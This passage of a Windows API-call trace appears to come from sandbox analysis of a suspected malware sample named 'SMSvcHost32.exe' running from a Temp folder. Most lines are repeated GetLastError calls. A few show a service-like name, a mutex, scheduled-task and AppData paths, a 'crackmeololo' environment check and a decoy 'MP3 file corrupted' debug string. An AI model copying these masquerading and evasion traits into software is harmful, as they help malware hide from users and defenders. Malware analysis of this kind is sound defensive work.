	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.864] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetLastError () returned 0x7a
	[0069.865] GetSidSubAuthorityCount (pSid=0x728940*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 0x728941
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.865] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetSidSubAuthority (pSid=0x728940*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000), nSubAuthority=0x0) returned 0x728948
	[0069.866] CloseHandle (hObject=0x1ac) returned 1
	[0069.866] GetVersion () returned 0x23f00206
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.866] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.867] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.868] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.869] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%\\Microsoft\\Internet Explorer\\", lpDst=0x72ae98, nSize=0x104 | out: lpDst="C:\\Users\\Nd9E1FYi\\AppData\\Roaming\\Microsoft\\Internet Explorer\\") returned 0x3f
	[0069.870] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\Tasks\\", lpDst=0x72b0a8, nSize=0x104 | out: lpDst="C:\\Windows\\Tasks\\") returned 0x12
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetLastError () returned 0x0
	[0069.870] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x202fca4, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0069.870] PathFindFileNameW (pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe") returned="SMSvcHost32.exe"
	[0069.870] lstrlenW (lpString="SMSvcHost32.exe") returned 15
	[0069.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SMSvcHost32.exe", cchWideChar=15, lpMultiByteStr=0x728280, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SMSvcHost32.exe", lpUsedDefaultChar=0x0) returned 15
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.871] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] GetLastError () returned 0xcb
	[0069.872] OpenMutexW (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="ServiceEntryPointThread") returned 0x0
	[0069.872] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="ServiceEntryPointThread") returned 0x1ac
	[0069.872] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40ec70, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1b4
	[0069.873] CloseHandle (hObject=0x1b4) returned 1

Thread:
	id = 47
	os_tid = 0xe30

	[0069.876] StrRChrW (lpStart="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Temp\\SMSvcHost32.exe", lpEnd=0x0, wMatch=0x5c) returned="\\SMSvcHost32.exe"
	[0069.877] StartServiceCtrlDispatcherW (lpServiceTable=0x246ff64*(lpServiceName="SMSvcHost32.exe", lpServiceProc=0x4220d0)) returned 0

Thread:
	id = 48
	os_tid = 0xa40

	[0069.884] GetLastError () returned 0x57
	[0069.884] GetLastError () returned 0x57
	[0069.884] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.885] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] GetLastError () returned 0x57
	[0069.886] OutputDebugStringA (lpOutputString="MP3 file corrupted") 
	[0069.886] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40feb0, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c8
	[0069.887] CloseHandle (hObject=0x1c8) returned 1
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetLastError () returned 0x57
	[0069.887] GetEnvironmentVariableA (in: lpName="crackmeololo", lpBuffer=0x25af9cc, nSize=0x104 | out: lpBuffer="") returned 0x0
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.887] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetLastError () returned 0xcb
	[0069.888] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0069.889] GetProcAddress (hModule=0x765a0000, lpProcName="GetNativeSystemInfo") returned 0x765bac70
	[0069.889] GlobalMemoryStatusEx (in: lpBuffer=0x25af994 | out: lpBuffer=0x25af994) returned 1
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.889] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
	[0069.890] GetLastError () returned 0xcb
